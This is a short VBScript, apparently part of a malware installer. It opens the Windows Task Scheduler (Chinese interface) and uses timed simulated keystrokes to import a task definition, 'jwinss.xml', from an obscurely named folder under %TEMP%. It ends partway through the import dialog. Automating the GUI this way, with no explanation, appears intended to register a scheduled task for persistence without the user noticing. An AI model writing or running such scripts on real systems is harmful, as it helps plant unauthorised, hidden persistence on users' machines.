set ws=createobject("wscript.shell")
ws.run "taskschd.msc"
WScript.sleep 5500
ws.AppActivate "任务计划程序"
ws.AppActivate "任务计划程序"
ws.AppActivate "任务计划程序"
ws.AppActivate "任务计划程序"
ws.AppActivate "任务计划程序"
WScript.sleep 300
ws.sendkeys "%a"
WScript.sleep 300
ws.sendkeys "m"
WScript.sleep 3500
ws.sendkeys "^l"
ws.sendkeys "^l"
WScript.sleep 300
ws.sendkeys "{%}TEMP{%}\jwinsd{ENTER}"
WScript.sleep 300
ws.sendkeys "%n"
ws.sendkeys "%n"
WScript.sleep 300
ws.sendkeys "jwinss.xml{ENTER}"
WScript.sleep 3500
ws.sendkeys "{TAB}{TAB}{TAB}{TAB}{TAB}"
ws.sendkeys "{TAB}{TAB}{TAB}{TAB}{RIGHT}"